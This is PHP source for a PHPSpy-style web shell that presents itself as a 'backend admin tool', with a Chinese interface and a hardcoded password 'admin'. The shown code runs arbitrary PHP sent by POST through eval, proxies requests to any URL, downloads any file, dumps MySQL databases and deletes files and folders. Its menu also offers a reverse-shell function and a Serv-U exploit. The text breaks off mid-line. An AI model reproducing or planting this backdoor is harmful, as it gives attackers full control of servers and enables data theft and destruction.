<?php
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
/*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check'] = "1";
// 如果需要密码验证,请修改登陆密码
$admin['pass'] = "admin";
// 是否允许phpspy本身自动修改编辑后文件的时间为建立时间(yes/no)
$retime = "no";
// 默认cmd.exe的位置,proc_open函数要使用的,linux系统请对应修改.(假设是winnt系统在程序里依然可以指定)
$cmd = "cmd.exe";
// 下面是操作信息回显栏平常的内容
$notice = '<table width=98% border=0 cellpadding=0 cellspacing=0><tr><td><b>域名:'.$_SERVER['HTTP_HOST'].'</b></td><td align="center">时间:'.date("Y年m月d日 h:i:s",time()).'</td><td align="right"><b>IP:'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>';
/*===================== 配置结束 =====================*/
// 允许程序在 register_globals = off 的环境下工作
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");
/*===================== 身份验证 =====================*/
if($admin['check'] == "1") {
if ($_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$self."\">三秒后自动退出或单击这里退出程序界面 >>></a></span>";
exit;
}
if ($_POST['do'] == 'login') {
$thepass=trim($_POST['adminpass']);
if ($admin['pass'] == $thepass) {
setcookie ("adminpass",$thepass,time()+(1*24*3600));
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$self."\">三秒后自动跳转或单击这里进入程序界面 >>></a></span>";
exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
// 查看PHPINFO
if ($_GET['action'] == "phpinfo") {
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看<PHP环境变量>";
exit;
}
if($_GET['action'] == "nowuser") {
$user = get_current_user();
if(!$user) $user = "报告长官,主机变态,无法获取当前进行用户名!";
echo"当前进程用户名:$user";
exit;
}
if(isset($_POST['phpcode'])){
eval("?".">$_POST[phpcode]<?");
exit;
}
// 在线代理
if (isset($_POST['url'])) {
$proxycontents = @file_get_contents($_POST['url']);
echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";
exit;
}
// 下载文件
if (!empty($downfile)) {
if (!@file_exists($downfile)) {
echo "<script>alert('你要下的文件不存在!')</script>";
} else {
$filename = basename($downfile);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP Generated Data');
header('Content-Length: '.filesize($downfile));
@readfile($downfile);
exit;
}
}
// 直接下载备份数据库
if ($_POST['backuptype'] == 'download') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$table = array_flip($_POST['table']);
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "出错: ".mysql_error();
$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata.= sqldumptable($currow[0]);
$mysqldata.= $mysqldata."\r\n";
}
}
mysql_close();
exit;
}
// 程序目录
$pathname=str_replace('\\','/',dirname(__FILE__));
// 获取当前路径
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
if (!file_exists("$dir")) $dir = ".";
$nowpath = getPath($pathname, $dir);
}
// 判断读写情况
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\">注册表操作</a>" : "";
$tb = new FORMS;
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="zh-CN">
<head>
<meta name="author" content="谢立华" />
<META http-equiv=Page-Enter content="revealTrans(duration=1.0, transition=12)"/>
<!--base onmouseover="window.status='娄底泽丰电脑,娄底人自己的DIY乐园[www.86738.cn]';return true" /-->
<title>PHP后台管理工具</title>
<style type="text/css">
<!--
* {margin: 0;padding:0;}
body{font-family: Verdana, Arial, Helvetica, sans-serif, 宋体;font-size: 12px;color: #3A6EA5;background-color:#E5E5E5;line-height:140%;table-layout:fixed;word-break:break-all;}
.smlfont {font-size:11px;}
input {font-size:11px;BACKGROUND-COLOR: #FFF;height: 18px;border: 1px solid #666;}
.redfont {COLOR:#CA0000;}
a:link,a:visited {font-weight:bold;color:#666}
a:hover{color: #ff0000;text-decoration: none;}
img {border: none;}
.mm{margin:0 auto;width:775px;float:none;BACKGROUND-COLOR: "#000;height:5px;}
.top {BACKGROUND-COLOR: "#CCCCCC;}
.firstalt {BACKGROUND-COLOR: #EFEFEF;}
.secondalt {BACKGROUND-COLOR: #F5F5F5;}
-->
</style>
<SCRIPT language=JavaScript>
<!--
var CheckAll=new Function("form","for (var i=0;i<form.elements.length;i++) {var e = form.elements[i];if (e.name != 'chkall') e.checked = form.chkall.checked;}");
var really=new Function("d","f","m","t","if (confirm(m)) { if (t == 1) {window.location.href='?dir='+d+'&deldir='+f;} else {window.location.href='?dir='+d+'&delfile='+f;}}");
var show=new Function("oDIV","oDIV.style.display =(oDIV.style.display == \"none\")?\"block\":\"none\";");
//function show(oDIV){oDIV.style.display = (oDIV.style.display == "none") ? "block" : "none";}
-->
</SCRIPT>
</head>
<body><center>
<?php
$tb->tableheader();
$tb->tdbody('<span style="DISPLAY: block; FILTER: glow(color=#FFFFFF,strength=5); COLOR: blue; HEIGHT: 1px; TEXT-ALIGN: center;border: 1px solid #66ccff;"> ╣ 后台管理工具 ╠ </span>');
$tb->tablefooter();
$test = "";
if(!$_GET['dir']) $dir = "./";
$tb->tableheader();
$tb->tdbody('| <a href="?action=logout">注销登录</a> | <a href="?action=dir">Shell 目录</a> | <a href="?action=phpenv">环境变量</a> | <a href="?action=proxy">在线代理</a>'.$reg.$phpinfo.' | <a href="?action=shell">WebShell</a> | ');
$tb->tdbody('| <a href="?action=downloads">Http 文件下载</a> | <a href="?action=search&dir='.$dir.'">文件查找</a> | <a href="?action=eval">执行php脚本</a> | <a href="?action=sql">执行SQL语句</a> | <a href="?action=sql&type=fun">Func反弹Shell</a> | <a href="?action=sqlbak">MySQL Backup</a> | <a href="?action=SUExp">Serv-U EXP</a> |');
$tb->tablefooter();
/*===================== 执行操作 开始 =====================*/
$tb->tableheader();
// 删除文件
if (!empty($delfile)) {
if (file_exists($delfile)) $tb->tdbody((@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!");
else $tb->tdbody(basename($delfile)." 文件已不存在!");
}
// 删除目录
elseif (!empty($deldir)) {
$deldirs="$dir/$deldir";
if (!file_exists("$deld
